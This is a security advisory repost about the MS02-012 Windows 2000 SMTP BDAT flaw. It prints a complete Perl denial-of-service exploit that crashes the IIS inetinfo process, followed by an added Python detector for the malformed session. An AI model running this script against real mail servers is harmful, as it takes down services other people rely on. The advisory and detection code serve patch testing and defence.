As we reported in our previous article, "Malformed Data Transfer Request Causes Windows SMTP Service to Fail", it is possible to crash Microsoft's SMTP server by sending it a malformed BDAT request. The following exploit code can be used by administrators to test their servers for the vulnerability.

Credit:
The information has been provided by H D Moore.

Exploit:
#!/usr/bin/perl -w
##################
#
#
# URL: http://www.digitaloffense.net/
# EMAIL: hdm@digitaloffense.net
# USAGE: ./mssmtp_dos.pl <target ip>
#
# Summary:
#
# The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
# Denial of Service attack through the BDAT command. If exploited, this
# vulnerability will cause any and all services running under IIS (the
# inetinfo.exe process) to become unavailable.
#
#
# Solution:
#
# http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
#
use IO::Socket;
$target = shift() || "127.0.0.1";
my $port = 25;
my $rcpt = "Administrator";
my $from = "crash\@burn.com";
my $sock = IO::Socket::INET->new (
    PeerAddr => $target,
    PeerPort => $port,
    Proto    => 'tcp'
) || die "could not connect: $!";
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}
print $sock "HELO $target\r\n";
$resp = <$sock>;
print $sock "MAIL FROM: $from\r\n";
$resp = <$sock>;
print $sock "RCPT TO: $rcpt\r\n";
$resp = <$sock>;
print $sock "BDAT 4\r\n";
print $sock "b00mAUTH LOGIN\r\n";
$resp = <$sock>;
print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";
close($sock);
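
Detection sketch (an added example, not part of the original advisory or of H D Moore's code): a parser for the client side of an SMTP session that skips BDAT chunk octets by their declared length and flags a command arriving while a BDAT transfer is still open, which is the pattern the test script above produces. The set of verbs tolerated mid-transfer and the sample streams are assumptions made for this example.

```python
import re

# Heuristic assumption: verbs we expect between chunks of an open BDAT transfer.
ALLOWED_MID_TRANSFER = {"BDAT", "RSET", "NOOP", "QUIT"}
BDAT_RE = re.compile(rb"^BDAT\s+(\d+)(\s+LAST)?\s*$", re.IGNORECASE)

def scan_client_stream(data: bytes):
    """Return findings for one reassembled client-to-server SMTP byte stream."""
    findings = []
    pos = 0
    in_transfer = False  # True after a BDAT chunk that was not marked LAST
    while pos < len(data):
        end = data.find(b"\r\n", pos)
        if end == -1:
            break  # trailing partial line, nothing more to parse
        line, pos = data[pos:end], end + 2
        if not line.strip():
            continue
        match = BDAT_RE.match(line)
        if match:
            size = int(match.group(1))
            if pos + size > len(data):
                findings.append(("truncated_chunk", line.decode("ascii", "replace")))
                break
            pos += size  # chunk octets are opaque data, not commands
            in_transfer = match.group(2) is None
            continue
        verb = line.split(None, 1)[0].upper().decode("ascii", "replace")
        if in_transfer and verb not in ALLOWED_MID_TRANSFER:
            findings.append(("command_inside_bdat_transfer", verb))
        if verb == "RSET":
            in_transfer = False
    return findings

# Constructed samples (not captured traffic).
MALFORMED = (b"HELO client.example\r\nMAIL FROM: a@example.com\r\n"
             b"RCPT TO: b@example.com\r\nBDAT 4\r\nb00mAUTH LOGIN\r\n\r\n")
BENIGN = (b"EHLO client.example\r\nMAIL FROM:<a@example.com>\r\n"
          b"RCPT TO:<b@example.com>\r\nBDAT 5\r\nhelloBDAT 0 LAST\r\nQUIT\r\n")

if __name__ == "__main__":
    for name, stream in (("malformed", MALFORMED), ("benign", BENIGN)):
        print(name, scan_client_stream(stream))
```

A finding marks a session worth reviewing on hosts that have not yet applied the MS02-012 fix; it does not by itself show that the service failed.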